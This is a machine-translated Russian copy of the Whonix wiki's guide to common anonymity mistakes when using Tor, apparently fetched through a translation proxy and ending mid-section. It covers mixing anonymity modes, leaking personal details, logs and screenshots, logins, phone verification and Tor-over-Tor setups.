В идеальном мире совершенство было бы достигнуто с помощью сети Tor, браузера Tor, компьютерного оборудования, физической безопасности, базовой операционной системы и т. д. Например, в этой утопии пользователь может получить новостной веб-сайт, и ни новостной веб-сайт, ни интернет-провайдер веб-сайта не будут иметь никакого представления, если пользователь когда-либо вступал в контакт раньше. [[2]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-2)

В отличие от этого, несовершенный сценарий приводит к тому, что программное обеспечение используется неправильно, например, когда фондовый Firefox используется по сети Tor вместо "безопасного" браузера Tor. Несчастный пользователь Firefox по-прежнему защищает свое первоначальное соединение (IP- адрес / местоположение) от обнаружения, но идентификатор (например, файлы cookie) может быть использован, чтобы сделать это соединение псевдонимным. Например, целевой веб-сайт может регистрировать "пользователя с идентификатором 111222333444 просмотренного видео заголовка A в момент времени B на Дату C и видео заголовка D в момент времени E на дату F." эта информация может использоваться для профилирования, которое со временем становится более полным. Набор анонимности постепенно сокращается, и в худшем случае приводит к деанонимизации.

Как только пользователь входит на веб-сайт с именем пользователя для таких действий, как публикация на форуме или веб-почта, соединение по определению больше не анонимно, а псевдонимно. Происхождение соединения (IP-адрес / местоположение) по-прежнему скрыто, но соединение может быть связано с идентификатором [[1] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-identifier-1); в этом случае имя учетной записи. Идентификаторы могут использоваться для ведения журнала различных вещей: когда пользователь что-то написал, дата и время входа и выхода из системы, что пользователь написал и кому, используемый IP-адрес (бесполезно, если это реле выхода Tor), записанный отпечаток пальца браузера и т. д.

Максим Каммерер, разработчик Liberté Linux [[3]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-3), имеет разрозненные представления об анонимности и псевдонимности, которые не следует скрывать от читателя: [[4]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-4)

Я не видел убедительных аргументов в пользу анонимности, в отличие от псевдонимности. Расширение наборов анонимности-это то, что разработчики Tor делают для публикации дополнительных статей и обоснования финансирования. Большинство пользователей должны быть только псевдонимы, где их местоположение скрыто. Наличие уникального браузера не позволяет волшебным образом раскрыть местоположение пользователя, если этот пользователь не использует этот браузер для неименованных действий. Наличие хороших результатов заголовка браузера по проверке анонимности также не означает многого, потому что есть много способов раскрыть больше деталей клиента (например, через странности Javascript).

Click to expand...

Смешайте режимы анонимности
[](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/w/index.php?title=File:Ambox_warning_pn.svg.png&filetimestamp=20130717200816&) Внимание: не смешивайте режимы анонимности!

Ниже перечислены четыре основных режима.

Режим 1: анонимный пользователь; любой получатель

Сценарий: анонимное размещение сообщений на доске объявлений, в списке рассылки, в поле комментариев, на форуме и т. д.

Сценарий: разоблачители, активисты, блогеры и тому подобные пользователи.

Пользователь является анонимным.

Реальный IP-адрес / местоположение остается скрытым.

Конфиденциальность местоположения: местоположение пользователя остается секретным.

Режим 2: пользователь знает получателя; оба используют Tor

Сценарий: отправитель и получатель знают друг друга и оба используют Tor.

Коммуникация происходит без какой-либо третьей стороны, осведомленной об этой деятельности или имеющей знания о том, что отправитель и получатель общаются друг с другом.

Пользователь не является анонимным. [5]

Реальный IP-адрес / местоположение пользователя остается скрытым.

Конфиденциальность местоположения: местоположение пользователя остается секретным.

Режим 3: пользователь не является анонимным и использует Tor; любой получатель

Сценарий: вход с реальным именем в любую службу, такую как веб-почта, Twitter, Facebook и другие.

Пользователь явно не является анонимным. Как только настоящее имя используется для входа в учетную запись, веб-сайт знает личность пользователя. Tor не может обеспечить анонимность в этих обстоятельствах.

Реальный IP-адрес / местоположение пользователя остается скрытым.

Расположение конфиденциальность. Местоположение пользователя остается секретным. [6]

Режим 4: пользователь не является анонимным; любой получатель

Сценарий: обычный просмотр без Tor.

Пользователь не является анонимным.

Реальный IP-адрес / местоположение пользователя раскрывается.

Местоположение пользователя раскрывается.

Заключение
На основе приведенной выше информации в приведенной ниже таблице описывается нецелесообразное поведение.

Таблица: Опасные Комбинации Режимов Анонимности

Сочетание | Пример
---|---
Режимы анонимности 1 + 2| Если пользователь имеет учетную запись обмена мгновенными сообщениями или электронной почты и использует ее через режим 1, нецелесообразно использовать ту же учетную запись для режима 2. Причина заключается в том, что пользователь смешивает абсолютную анонимность (режим 1) с выборочной анонимностью (режим 2; поскольку получатель знает пользователя).
Два или более режимов внутри одного сеанса Tor| Использование зашифрованного приложения чата через Tor, а затем размещение в форуме Whonix ™ без поворота каналов Tor. Если режимы используют одно и то же реле выхода Tor, это может привести к корреляции идентичности.
Два режима или внутри одного и того же Whonix-Workstation ™| Использование того же Whonix-Workstation ™ для зашифрованной электронной почты, а также размещение в списке рассылки проекта Tor. Если рабочая станция скомпрометирована, это приводит к корреляции идентификаторов.
Другая комбинация| Сочетание других режимов также может быть опасным и может привести к утечке личной информации или физическому местонахождению пользователя.

Лицензия
Лицензия "не смешивать режимы анонимности": [[7]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-adrelicense-7)

Личности, личная и системная информация

Раскрывать идентифицирующие данные онлайн
Деанонимизация возможна не только с помощью подключений / IP-адресов, но и с помощью социальных угроз. Ниже приводится ряд разумных рекомендаций, предложенных Anonymous во избежание обезличивания. Пользователи не должны :

Включать личную информацию или интересы в никах.

Обсудите личную информацию, такую как местоположение, возраст, семейное положение и так далее. Со временем дискуссии о чем-то бессмысленном, например о погоде, могут привести к точному представлению о местоположении пользователя.

Упомяните свой пол, татуировки, пирсинг, физические возможности или инвалидность.

Упомяните свою профессию, хобби или участие в группах активистов.

Используйте специальные символы на клавиатуре, которые существуют только в вашем языке.

Публикуйте информацию в обычном интернете (clearnet), оставаясь анонимным.

Используйте Twitter, Facebook и другие платформы социальных сетей. Это легко соотнести.

Публикуйте ссылки на изображения в Facebook. Имя изображения содержит личный идентификатор.

Подключение к одному и тому же пункту назначения в одно и то же время дня или ночи. Попробуйте изменить время подключения.

Забудьте, что IRC, другие чаты, форумы, списки рассылки и так далее являются публичными аренами.

Обсудите что-нибудь личное вообще, даже когда безопасно и анонимно соединяетесь с группой незнакомых людей.

Получатели группы представляют собой потенциальный опасный риск ("известные неизвестные") и могут быть вынуждены работать против пользователя.

Для уничтожения группы достаточно одного информатора.

Возможно, самое главное, никогда не забывайте, что герои существуют только в комиксах и активно нацелены. Есть только молодые герои и мертвые герои.

Если какие-либо идентифицирующие данные должны быть раскрыты, рассматривайте их как "конфиденциальные данные", как указано в предыдущем пункте.

Лицензия: из [документации JonDonym ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/anonymous-proxy-servers.net/en/help/anonymous-irc.html) [[архив] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://anonymous-proxy- servers.net/en/help/anonymous-irc.html)( [разрешение ](https://z5h64q92x9.net/proxy_u/en-ru.ru/https/anonymous-proxy- servers.net/forum/viewtopic.php?p=31220#p31220) [[архив]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://anonymous-proxy- servers.net/forum/viewtopic.php?p=31220#p31220)).

Делайте неверные выводы
Некоторые пользователи делают вывод, что поскольку различные механизмы компьютерной безопасности могут быть разрушены в неясных случаях, их не стоит реализовывать. Например, они могли бы:

Не удается использовать пароль BIOS, потому что история вычислений показывает, что главный пароль BIOS существовал в определенное время.

Игнорируйте советы, касающиеся полного шифрования диска из-за существования векторов атаки, таких как атаки с холодной загрузкой .

Не установлена защита от злых девиц [архив] для их компьютера (несмотря на наличие доверенного платформенного модуля), поскольку исследования показывают, что злоумышленники иногда могут восстановить закрытые ключи из схем цифровой подписи. [8]

Используйте менее исследованные, недоказанные, проприетарные сети в предпочтении к Tor, из-за известных уязвимостей, таких как сквозные корреляционные атаки.

Нелогично обходить давно изученные и надежные механизмы безопасности из-за предполагаемых сбоев, особенно если пользователь не является экспертом в рассматриваемой области, такой как маршрутизация Tor, полное шифрование диска и т. д.-Не позволяйте идеальному быть врагом хорошего. Компьютерные программные и аппаратные решения всегда будут оставаться несовершенными, но с течением времени происходят устойчивые, постепенные улучшения. Это ошибка- путать открытость и понимание разработчиков / инженеров, которые выделяют недостатки, а затем определяют, что обсуждаемое программное или аппаратное обеспечение является неисправимым.

Поддерживайте долгосрочные идентичности
Чем дольше используется один и тот же псевдоним, тем выше вероятность того, что будут допущены ошибки, раскрывающие личность пользователя. Как только это происходит, противник может вернуться назад и связать всю деятельность, связанную с псевдонимом. В качестве меры предосторожности, регулярно создавайте новые удостоверения и прекратите использовать старые.

Публикация полных системных журналов или файлов конфигурации
В обычной компьютерной системе журналы будут создаваться хостом или виртуальными операционными системами, приложениями и другими фоновыми процессами. Каждая из записей журнала содержит различные подробные сведения о деятельности системы и сети. Файлы конфигурации также могут раскрывать сведения, которые ухудшают конфиденциальность. В зависимости от журнала или файла конфигурации, о котором идет речь, это может включать: [[9] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-9) [[10] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-10) [[11]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-11)

IP-адреса хоста.

Информация о времени загрузки.

Конкретные места, откуда поступает информация, например сообщения или электронные письма.

Входы / попытки аутентификации.

Временная метка.

Запуск фоновых демонов.

Сообщение ядра.

Подробная информация об операционной системе, конфигурациях и протоколах.

Сведения обо всех подключенных устройствах.

Имена пользователей и учетные записи.

Привилегированный пользователь.

Сетевые конфигурации и соединения.

Поставщики и конфигурации VPN.

Тор мосты, охранники или выходы используются.

Детальные спецификации оборудования, включая потенциально серийные номера.

Пакеты программного обеспечения, сведения о версии и события установки.

Информация о работе почтовых или веб-серверов.

Принтер и печать сопутствующей информации.

Детали часового пояса.

Настройка брандмауэра.

Неверно настроенные программные приложения.

Информация о задании Cron.

Операции командной строки.

И еще.

Журналы являются полезным инструментом для отладки или лучше понять, насколько хорошо приложения работают в системе. Однако, если пользователь рассматривает возможность публикации системных журналов при запросе помощи, то он должен быть тщательно куратор, а не публиковаться в полном объеме. Аналогично, опасно размещать полные конфигурационные файлы, например файлы torrc, которые раскрывают полную информацию о мосте. Если этот совет игнорируется, пользователь может быть непреднамеренно деанонимизирован или иным образом предоставить сведения, которые помогают противнику атаковать их систему.

Разместить чувствительные скриншоты или фотографии экрана
Пользователи часто публикуют [скриншоты ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/en.wikipedia.org/wiki/Screenshot) [[архив]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://en.wikipedia.org/wiki/Screenshot), снимки экрана или фотографии всего рабочего стола, не учитывая последствия для конфиденциальности или потенциальные [метаданные](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Metadata), которые прикреплены к изображению. В зависимости от того, что видно на картинке, это может показать операционную систему пользователя, часовой пояс, имя пользователя, документы, пакеты программного обеспечения и другую конфиденциальную информацию. [[12] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-12)Если мета-теги не удаляются, особенно с [фотографий ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Surfing_Posting_Blogging#Anonymous_Photo_Sharing), то [данные EXIF ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/en.wikipedia.org/wiki/Exchangeable_image_file_format) [[архив] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/https://en.wikipedia.org/wiki/Exchangeable_image_file_format) [[архив] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/web.archive.org/web/http://forensicswiki.org/wiki/Exif)могут привести к значительному сокращению набора анонимности пользователя или в худшем случае привести к деанонимизации.

Фотографии с цифровыми камерами могут также выявить дополнительную информацию, связанную с отражениями экрана, видимыми объектами вне экрана, количеством видимого света (указывающего вероятное время дня или ночи) и, возможно, отпечатками пальцев, оставленными на самом экране. Как минимум, все загруженные изображения должны быть очищены с [помощью инструментария анонимизации метаданных ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Metadata#MAT_- _Metadata_Anonymisation_Toolkit)или других [других инструментов ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Metadata#Other_Tools).

Отправка конфиденциальных данных без сквозного шифрования
[](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/w/index.php?title=File:Ambox_warning_pn.svg.png&filetimestamp=20130717200816&) Как уже объяснялось на странице [предупреждения](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Warning), реле выхода Tor могут подслушивать коммуникации, и атаки "человек в середине" возможны даже с использованием HTTPS. Использование сквозного шифрования является единственным способом отправки конфиденциальных данных получателю без их потенциального перехвата и разглашения враждебным третьим лицам.

Используйте разные сетевые удостоверения одновременно
Управление контекстными идентичностями в интернете становится все более сложным и чреватым ошибками. Различные сетевые идентификаторы могут быть легко сопоставлены при одновременном использовании, так как Tor может повторно использовать каналы в одном сеансе просмотра или информация может потенциально утечка из Whonix-Workstation ™. Whonix ™ волшебным образом не [разделяет различные контекстуальные идентичности ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Warning#Whonix_.E2.84.A2_does_not_Separate_Different_Contextual_Identities).

Использовать (мобильный) телефон верификация
Веб-сайты, такие как Google, Facebook и другие, будут запрашивать номер (мобильного) телефона при попытке войти через Tor. Если пользователь не является действительно умным или имеет альтернативу, эта информация не должна предоставляться.

Все предоставленные телефонные номера будут уже зарегистрированы. SIM-карта, скорее всего, зарегистрирована на имя пользователя. Даже если это не так, получение SMS выдает местоположение пользователя. Пользователи могут попытаться анонимно купить SIM-карту вдали от своего обычного домашнего адреса, но есть еще один риск: сам телефон. Каждый раз, когда телефон входит в мобильную сеть, поставщик будет регистрировать серийный номер SIM-карты [[13] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-13) и серийный номер телефона. [[14] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-14)если SIM-карта куплена анонимно, но не телефон, она не является анонимной, потому что эти два сериала будут связаны.

Если пользователь действительно хочет сделать мобильную проверку, то рекомендуется удаленное от дома место, а также свежий телефон и новую SIM- карту. После этого телефон должен быть выключен, и сразу же как телефон, так и SIM-карта должны быть полностью уничтожены. Это может потребовать сжигания предметов или других изобретательных (гарантированных) методов уничтожения.

Пользователи могут попытаться найти онлайн-сервис, который будет получать личное SMS от их имени. Это сработало бы и было бы анонимно. Проблема в том, что этот метод, вероятно, не будет работать для Google и Facebook, потому что они активно черный список таких номеров для проверки. Другой вариант- попытаться найти кого-то еще, чтобы получить SMS для вас, но это только переложит риск на другого человека. [[15]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-15)

Интернет-серверы и ресурсы

Подключение к серверу анонимно и не анонимно одновременно
Настоятельно рекомендуется не создавать соединения Tor и non-Tor с одним и тем же удаленным сервером одновременно. В случае сбоя подключения к интернету (и это будет в конечном итоге), все соединения будут нарушены одновременно. После этого события для противника легко определить, какой публичный IP-адрес / местоположение принадлежит какому IP-адресу / соединению Tor, потенциально идентифицируя пользователя напрямую.

Этот сценарий также включает другую форму атаки веб-серверов. Скорость соединения non-Tor или Tor может быть увеличена или уменьшена, чтобы увидеть, существует ли корреляция. То есть, если либо соединение становится быстрее, либо медленнее в унисон, то связь между не-Tor и Tor link может быть установлена.

Лицензия " не подключайтесь ни к одному серверу анонимно и не анонимно одновременно!": [[7]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-adrelicense-7)

Откройте случайные файлы или ссылки
Если пользователю отправляется любой тип файла или ссылка на файл (или случайный URL/ресурс интернета), либо по электронной почте или другим способом, рекомендуется соблюдать осторожность независимо от формата файла. [[16] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-16)этот отправитель, почтовый ящик, учетная запись или ключ могут быть скомпрометированы, а файл или ссылка могут быть подготовлены для заражения системы пользователя при открытии с помощью стандартного приложения. Также возможно, что файлы, такие как PDF- файлы, могут пропускать диапазон системных данных или иметь встроенный код отслеживания, который активируется при открытии в подключенной к интернету виртуальной машине.

Безопаснее не открывать файл с помощью инструмента по умолчанию, который ожидается создателем файла. Например, PDF не должен быть открыт с помощью средства просмотра PDF, или если содержимое является общедоступным,можно использовать бесплатный онлайн-просмотрщик PDF. Большая безопасность будет включать в себя дезинфекцию PDF в [Qubes-Whonix ™](https://z5h64q92x9.net/proxy_u/en-ru.ru/https/www.whonix.org/wiki/Qubes- Whonix), или открытие файла или ссылки в [DisposableVM, ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Qubes/DisposableVM)чтобы он не мог поставить под угрозу платформу пользователя. Более того, компьютер также может быть физически отключен от Интернета или отключен доступ к сети виртуальной машины перед его открытием.

Сначала распространите свою собственную ссылку
[](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/w/index.php?title=File:Ambox_warning_pn.svg.png&filetimestamp=20130717200816&) Избегайте соблазна быть одним из первых людей, чтобы продвигать свой новый "анонимный" проект!

Например, нецелесообразно распространять ссылки, если пользователь:

Создал анонимный блог или луковый сервис.

Имеет учетную запись twitter с большим количеством подписчиков.

Запускает большую страницу Новостей clearnet или аналогичную.

Чем больше идентичностей разделены, тем лучше. Конечно, в какой-то момент пользователь может или даже должен быть "естественно" осведомлен о новом проекте, но крайняя осторожность имеет смысл на данном этапе.

Посетите свой собственный веб-сайт, когда анонимно
"Интересно, как выглядит мой сайт, когда я аноним?" [[17]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-17)

Лучше всего избегать посещения личных веб-сайтов, на которых прикреплены либо реальные имена, либо псевдонимы, особенно если они когда-либо были привязаны к не-Tor-соединению / IP-адресу. Очень немногие люди, вероятно, посетят ваш личный сайт через Tor, то есть пользователь может быть единственным уникальным клиентом Tor, чтобы сделать это.

Такое поведение приводит к слабой анонимности, потому что после посещения веб- сайта схема Tor является "грязной". Если сайт не пользуется популярностью и не получает большого трафика, то Tor exit relay может быть достаточно уверен, что посетителем является пользователь. После этого момента можно разумно предположить, что дальнейшие соединения, возникающие из этого реле выхода Tor, также поступают с компьютера пользователя.

Источник: [[18]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-18)

Логины

Войдите в учетные записи, используемые без Tor
Всегда предполагайте, что каждый раз, когда веб-сайт посещается, ведение журнала целевым сервером будет включать: [[19]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-19)

IP-адрес / местоположение клиента.

Запрос даты и времени.

Запрошены конкретные веб-страницы.

HTTP код.

Количество байт, поданных пользователю.

Агент браузера пользователя.

Ссылающийся сайт (реферер).

Также предположим, что поставщик услуг интернета (ISP) будет по меньшей мере регистрировать общее время работы в интернете и IP-адрес / местоположение клиента. Интернет-провайдер также может регистрировать IP-адрес / местоположение посещенных пунктов назначения, сколько трафика (данных) было сгенерировано, а также что было отправлено и извлечено. Если интернет-трафик не зашифрован, интернет-провайдер сможет точно видеть, какие действия были выполнены, а также информацию, отправленную или полученную.

В следующих таблицах представлен упрощенный обзор того, как эти журналы могут отображаться для администраторов.

Таблица: журнал ISP

Имя | Время | IP / местоположение | Движение
---|---|---|---
Джон Доу| 16:00 - 17:00| 1.1.1.1| 500 Мбайт

Таблица: расширенный журнал ISP[[20]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-20)

Имя | Время | IP / местоположение | Движение | Место назначения | Содержание
---|---|---|---|---|---
Джон Доу| 16:00 - 17:00| 1.1.1.1| 1 Мбайт| google.com| Искал что-то одно, что-то другое...
Джон Доу| 16:00 - 17:00| 1.1.1.1| 490 Мбайт| youtube.com| Просмотр видео 1, Видео 2, ...
Джон Доу| 16:00 - 17:00| 1.1.1.1| 9 Мбайт| facebook.com| Зашифрованный трафик

Таблица: Журнал Сайта

Имя | Время | IP / местоположение | Движение | Содержание
---|---|---|---|---
-| 16:00 - 16.10| 1.1.1.1| 1 Мбайт| Искал что-то одно, что-то другое...

Очевидно, что единое ведение журнала веб-сайтами и интернет-провайдерами позволяет легко определять действия и интересы пользователя.

Учетная запись скомпрометирована и привязана к пользователю, если даже один вход происходит от подключения / IP-адреса не-Tor. Единичные ошибки часто бывают фатальными и приводят к падению многих "анонимных" пользователей.

Войдите на банковские или онлайн-платежные счета
Вход в банк, PayPal, eBay или другие важные финансовые счета, зарегистрированные на имя пользователя, не рекомендуется. Когда речь заходит о деньгах, использование Tor грозит приостановкой счета из-за" подозрительной активности " со стороны системы предотвращения мошенничества. Причина заключается в том, что хакеры иногда используют Tor для совершения мошенничества.

Использование Tor с онлайн-банкингом и платежными счетами не является анонимным по уже изложенным причинам. Он является псевдонимным и предлагает только конфиденциальность местоположения и метод обхода цензуры в случае, если доступ к сайту заблокирован провайдером. Различие между анонимностью и псевдонимом рассматривается в [предыдущем разделе ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#Confuse_Anonymity_with_Pseudonymity).

Если пользователь заблокирован, во многих случаях можно связаться с отделом поддержки сервиса для разблокирования учетной записи. Некоторые сервисы даже позволят смягчить политику защиты от мошенничества для учетной записи пользователя.

Разработчик Whonix ™ Патрик Шлайзер не возражает против использования Tor для обхода цензуры и / или конфиденциальности местоположения. Однако пользователь должен понимать, что банковские или другие онлайн-платежные счета рискуют быть временно приостановлены. Возможны и другие последствия (запреты на обслуживание, удаление учетной записи и т. д.), Как указано в предупреждениях на этой странице и во всей документации Whonix™. Пользователи, которые осознают риски и чувствуют себя комфортно с помощью Tor в своих личных обстоятельствах, конечно, могут игнорировать этот совет.

Войдите в учетные записи социальных сетей и думайте, что вы анонимны
Не входите в личный Facebook или другие учетные записи социальных сетей через Tor. Даже если вместо настоящего имени используется псевдоним, у учетной записи, скорее всего, есть связанные друзья, которые знают истинного владельца учетной записи. В результате социальная сеть может обоснованно догадаться, кто же на самом деле является пользователем.

Никакое решение анонимности не является идеальным. Программное обеспечение для обеспечения анонимности в интернете может надежно скрывать IP-адреса и данные о местоположении, но Facebook и подобные корпорации не нуждаются в этой информации. Социальные сети уже знают: кто такой пользователь, связанные с ним друзья, содержание "приватных" сообщений, отправленных и так далее. Эти данные, по крайней мере, хранятся на серверах социальных сетей, и никакое программное обеспечение не может удалить их. Удалить его могли только социальные сети и хакерские группы. [[21]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-21)

Пользователи, которые входят в личный Facebook и другие учетные записи, получают только конфиденциальность местоположения, но не анонимность.

Это не очень хорошо понимают некоторые пользователи социальных сетей: [[22]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-22)

Майк, я полностью обезличен, если я войду в свой аккаунт на facebook? im с помощью firefox 3.6 с tor и без сценария на машине windows 7. Спасибо.

Click to expand...

Войдите в Twitter, Facebook, Google и т.д. Дольше, чем это необходимо
Ограничьте время входа в систему для Twitter, Facebook, Google и любых других сервисов на основе учетных записей (таких как веб-форумы) до абсолютного минимума. Сразу же выйдите из системы после прочтения, размещения, ведения блога и выполнения других задач. После выхода из системы, это самое безопасное, чтобы затем выключить браузер Tor , изменить схему Tor с помощью контроллера [Tor](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Tor_Controller), подождите 10 секунд, пока схема не изменится, а затем перезагрузите браузер Tor. Для повышения безопасности следуйте [рекомендациям по использованию нескольких снимков виртуальной ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Whonix- Workstation_Security#VM_Snapshots)машины и / или [используйте несколько Whonix-Workstation ™s ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Multiple_Whonix-Workstation).

Это поведение необходимо, потому что многие веб-сайты включают одну или несколько кнопок интеграции, таких как кнопка "Нравится" Facebook и кнопка "Твитнуть Это"Twitter. [[23] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-23)на самом деле, в топ-200 000 Alexa-сайтов социальные виджеты Facebook и Twitter включены примерно в 47% и 24% из них, соответственно. Сторонние веб-службы Google включены примерно в 97% той же выборки, в основном состоящей из Google analytics, рекламных объявлений и услуг CDN (googleapis.com). [[24] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-24) [[25] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-25)если пользователь все еще зарегистрирован в Службе, эти кнопки сообщают исходной службе, что веб-сайт был посещен. [[26]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-26)

Не следует недооценивать опасность использования сторонних ресурсов для обеспечения конфиденциальности: [[27] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-27) [[28]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-28)

Каждый раз, когда браузер пользователя получает инструкции по извлечению стороннего ресурса, этот сторонний сервер получает возможность доставлять сценарии отслеживания и связывать сторонний веб-сайт с носителем сторонних файлов cookie и отпечатков пальцев браузера. Такое отслеживание поведения в интернете позволяет создавать все более подробные профили пользователей, включая конфиденциальную информацию, такую как политические взгляды пользователя и его медицинская история.

Click to expand...

Пользователи также должны прочитать главу [выше ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#Use_Different_Online_Identities_at_the_Same_Time).

Системные настройки
Измените настройки, если последствия неизвестны
Обычно безопасно изменять настройки пользовательского интерфейса для приложений, которые не подключаются к интернету. Например, установка флажка типа "не показывать больше ежедневные советы" или "скрыть эту строку меню" не окажет никакого влияния на анонимность.

Перед изменением всех интересующих вас параметров сначала ознакомьтесь с документацией Whonix™. Если изменение задокументировано и рекомендовано против, то попробуйте продолжить работу с настройками по умолчанию. Если изменение не задокументировано, то тщательно изучите предлагаемое действие, прежде чем продолжить.

Изменение настроек для приложений, которые подключаются к интернету (даже настройки пользовательского интерфейса) должны быть тщательно рассмотрены. Например, рекомендуется удалить строку меню или развернуть экран в браузере Tor. Последний, как известно, изменяет обнаруживаемый размер экрана, что ухудшает веб-отпечатки пальцев пользователя.

Изменение настроек сети должно осуществляться только с большой осторожностью, и если последствия известны. Например, пользователи должны избегать всех советов, касающихся "настройки Firefox". Если настройки считаются неоптимальными, то изменения должны быть предложены вверх по течению, чтобы они изменились для всех пользователей браузера Tor со следующим выпуском. Для получения полного списка небезопасных привычек браузера Tor, смотрите [здесь ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/Tor_Browser#Unsafe_Tor_Browser_Habits).

Tor

Разрешить Tor над сценариями Tor
[](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/w/index.php?title=File:Ambox_notice.png&filetimestamp=20130717195411&) Это специфическая проблема Whonix ™.

Когда используется прозрачный прокси (как в Whonix ™), можно запустить сеанс Tor от клиента, а также от прозрачного прокси, создавая сценарий "Tor поверх Tor". Это происходит при установке Tor внутри Whonix-Workstation ™ или при использовании браузера Tor без настройки его на использование SocksPort вместо транспорта. Это более подробно рассматривается в записи браузера Tor.

Это приводит к неопределенному и потенциально опасному поведению. В теории, пользователь может получить шесть прыжков вместо трех в сети Tor. Однако это не гарантирует, что три дополнительных получаемых прыжка различны; пользователь может в конечном итоге получить те же прыжки, возможно, в обратном или смешанном порядке. Мнение проекта Tor заключается в том, что это небезопасно: [[29]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-29)

Мы не хотим поощрять людей использовать пути длиннее этого — это увеличивает нагрузку на сеть без (насколько мы можем судить) обеспечения какой-либо дополнительной безопасности. Помните, что лучший способ атаковать Tor-это атаковать конечные точки и игнорировать середину пути. Кроме того, использование путей длиннее 3 может повредить анонимности, во-первых, потому что это облегчает атаки "отрицание безопасности", а во-вторых, потому что он может действовать в качестве идентификатора, если только несколько человек делают это ("о, есть тот человек, который снова изменил длину своего пути").

Click to expand...

Пользователи могут вручную выбрать точку входа или выхода в сети Tor, [[30] ](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-30)но лучшая безопасность зависит от того, чтобы оставить выбор маршрута (пути) для Tor. Переопределение выбора реле входа и/или выхода Tor может ухудшить анонимность способами, которые не совсем понятны. Поэтому, конфигурации Tor over Tor сильно обескуражены.

Лицензия на "предотвращение сценариев Tor over Tor.": [[7]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-adrelicense-7)

Используйте мосты, если Tor считается опасным или подозрительным в вашем местоположении
Эта рекомендация имеет важное предостережение, поскольку мосты не являются идеальным решением: [[31]](https://z5h64q92x9.net/proxy_u/en- ru.ru/https/www.whonix.org/wiki/DoNot#cite_note-31)

